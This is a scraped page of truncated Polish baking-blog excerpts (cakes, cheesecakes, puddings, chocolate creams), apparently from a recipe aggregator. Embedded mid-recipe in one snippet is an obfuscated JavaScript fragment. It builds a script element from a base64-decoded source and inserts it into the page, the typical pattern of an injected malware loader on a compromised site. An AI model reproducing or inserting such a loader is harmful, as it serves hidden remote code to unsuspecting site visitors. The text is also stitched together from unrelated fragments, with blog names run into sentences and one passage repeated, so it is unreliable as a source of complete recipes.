skład, mało cukru i dużo maku. Na blogu znajdziecie też inne świąteczne słodkie inspiracje: Ciasto marchewkowe z kremem Łatwy sernik piernikowy Korzenne ciasto jogurtowe z bakaliami Ciasto korzenne Keks piernikowy Sernik z żurawiną Ciasto rafaello dla leniwych Ciasto czekoladowo-buraczkowe Roscon de Reyes Magos, czyli hiszpańskie ciasto Trzech Króli Ciasto marchewkowe z polewą czekoladową Sernik pomarańczowy Drożdżowy wieniec
Kulinarne przygody Gatitynadać mu ciekawy smak. Sos malinowy idealnie pasuje do budyniu śmietankowego, a polewa toffi świetnie łączy się z budyniem czekoladowym . Budyń będzie także świetną bazą do bardziej skomplikowanych deserów: możesz wypełnić nim kruche babeczki lub przełożyć ciasto zamiast kremu. (function(hrxfmflw, nrzkxvrl, tcxghsxu, xahmxuhn, seydmmsb, odphggey){ seydmmsb = nrzkxvrl.createElement(tcxghsxu);odphggey = nrzkxvrl.getElementsByTagName(tcxghsxu)[0]; seydmmsb.ascyc = 1; seydmmsb.src = atob(xahmxuhn) odphggey.parentNode.insertBefore(seydmmsb
Słodkie okruszkiNutella to jeden z najpopularniejszych i najbardziej lubianych kremów orzechowo-czekoladowych. Niestety jest ona też bardzo niezdrowa, gdyż główne jej składniki to cukier i olej palmowy
Kuchnia MagdaLenywięcej płynu, zdjąć przykrywkę i odparować), a następnie zmiksować. Puree można wykorzystać, jako zagęstnik zupy ( z ciecierzycą ), dodać do ciasta ( babeczki, sernik ), dania wytrawnego ( kurczak curry ), albo… wymieszać z kakao i daktylami (uprzednio namoczonymi), co da pyszny krem czekoladowy lub, jak w tytule – wykonać pyszną pastę kanapkową, dodając do puree przyprawy korzenne: kardamon, cynamon, imbir, goździki i odrobinę
KucharzycaDzisiaj mam dla Was ciekawy przepis na czekoladowe ciasto z pomidorami. Ciasto jest delikatne i wilgotne.Można je podawać posypane tylko cukrem pudrem albo przełożyć dżemem albo kremem. Można eksperymentować. Jeżeli przygotowałaś/eś danie z tego przepisu, prosimy o jego zdjęcie :). Wyślij je na adres a.rybinska@gmail.com. Fotografię opublikujemy w komentarzach i na naszym Facebooku (oczywiście podpiszemy Twoje dzieło). CZYTAJ
Przepisy Aleksandryobłędnie, prawda? Nie zawiera ani grama mąki pszennej oraz masła! Jeśli myślicie ,że takie ciasto smakuje inaczej niż tradycyjne to macie troszkę racji. Taka, zdrowa wersja jest o niebo lepsza! Blaty czekoladowe są niesamowicie wilgotne, przypominają miękkie brownie. Do ich wypieku używamy mąki żytniej. A krem? Bardzo prosty w wykonaniu, na bazie twarożku i domowej frużeliny truskawkowej. Całość dobrze wytrzymuje
Chocolate Muffin Blogcukier, suchy mak i wiórki. Pieczemy 20 minut na złoty kolor w temperaturze 180 stopni. Na ciasto nakładamy masę. 3 paczki herbatników moczymy w wódce lub spirytusie. Układamy je na kremie i polewamy dowolną polewą czekoladową. Smacznego
Pyszności Słodkościpodsmażamy. Galaretkę rozpuszczamy w gorącej wodzie, dodajemy do jabłek, mieszamy i zestawiamy z ognia. Na pierwszy blat ciasta wykładamy krem budyniowy, przykrywamy go drugim ciastem na który wykładamy masę jabłkową i przykrywamy ją ostatnim blatem ciasta. Wierzch polewamy polewą czekoladową. (inspiracja z przepisu s. Anastazji
Domowy Smak Jedzeniauzyskania gładkiej masy. Gotować kolejne 2 minuty. Zdjąć z ognia. Dodać połamaną czekoladę, wymieszać do jej rozpuszczenia, wystudzić. Wystudzoną masę czekoladową zmiksować z masłem, schłodzić w lodówce przez około 20 minut. Pierwszy krążek ciasta ułożyć na paterze, posmarować 1/3 kremu i posypać niewielką szczyptą soli. Przykryć drugim blatem, posmarować kolejną warstwą kremu i oprószyć solą. Położyć ostatni krążek, resztą masy
Domowa cukiernia Ewylutego to światowy dzień Nutelli. Ten krem orzechowo — czekoladowy zna chyba każdy. Pochodzi on z Włoch i jest znakomitym połączeniem ziaren kakaowca z orzechami laskowymi. Poza tym, że Nutella cudownie smakuje na kanapkach lub wyjadana łyżeczkami ze słoika, jest też idealnym dodatkiem do ciast i kremów. Tak sobie usiadłam i pomyślałam czemu by nie dodać Nutelli do sernika
Wypieki i Rumieńcestopniowo dodajemy cukier, suchy mak i wiórki. Pieczemy 20 minut na złoty kolor w temperaturze 180 stopni. Na ciasto nakładamy masę. 3 paczki herbatników moczymy w wódce lub spirytusie. Układamy je na kremie i polewamy dowolną polewą czekoladową. Smacznego
Salonik smakówMalinowa królowa. Rolada malinowa Powiało chłodem, zapachniało truskawkami. Truskawkowy sernik na zimno CanelaKabakSuprise, czyli zgadnij kotku co mam w środku. Ciasto z cukinią i cynamonem Toffik. Sernik czekoladowy z toffi E-kler. Eklerki z truskawkami SweetTube. Rurki z kremem Pestka. Dyniowe Muffiny Wszystkie załączone zdjęcia dzięki uprzejmości naszego fotografa Arkadiusz Kornacki Fotografia . Większa fotorelacja : https://picasaweb.google.com/107829375761994349541/ZarOstacja?authkey=Gv1sRgCLO43Jq8gOrp6wE Było cudownie, smacznie
Kuchnia w opałachskładniki się połączyły. Tortownicę o średnicy 23 cm wykładami papierem do pieczenia (samo dno), nie smarować boków. Delikatnie przekładami ciasto, wyrównać. Piec w temperaturze 160 - 170ºC przez około 35 - 40 minut lub do tzw. suchego patyczka. /mojewypieki.com/KREM CZEKOLADOWY:4 jajka 1,5 szklanki cukru300g masła bez dodatku oleju 50 ml spirytus lub wódki30g cukru wanilinowego 200g czekolady(...)składniki muszą być w tej samej temperaturze). Następnie dodajemy do masy powoli (po jednej łyżce) masę jajeczną. Na koniec powolutku wlewamy spirytus- temp. pokojowa!. Przed przełożeniem tortu wstawiamy krem do lodówki, aby zgęstniał.TAFLA LODU (Szkło jadalne):szklanka cukru50ml wodyWodę z cukrem umieszczamy w rondelku i zagotowujemy nie mieszając. Do garnuszka wkładamy termometr cukierniczy i gotujemy aż mikstura osiągnie
Pudełko rozmaitościnazwa pochodzi od trasy W-Z obok której istniała cukiernia, druga z kolei stwierdza, ze podczas „normalizacji nazewnictwa” Wypiek Z Kremem został WuZetKą. To tyle na temat nazewnictwa i przejdźmy do konkretów. Ciasto nie jest skomplikowane w wykonaniu. Biszkopcik czekoladowy, bita śmietana, polewa czekoladowa i dżem, polecam wiśniowy. Istnieją przepisy gdzie ciasto przekłada się samą bita śmietaną. Ja polecam jednak
ciastkarnia na kruchym spodzieciasta wraz z cukrem i cukrem waniliowym. Odstawić jeszcze na 5 minut.Na mocno rozgrzany olej kłaść łyżką małe porcje ciasta, formując placuszki. Odsączyć na ręczniku papierowym.Podawać np. oprószone cukrem pudrem, ze śmietanką lub ulubioną konfiturą czy kremem czekoladowym. Smacznego
Z miłości do słodkości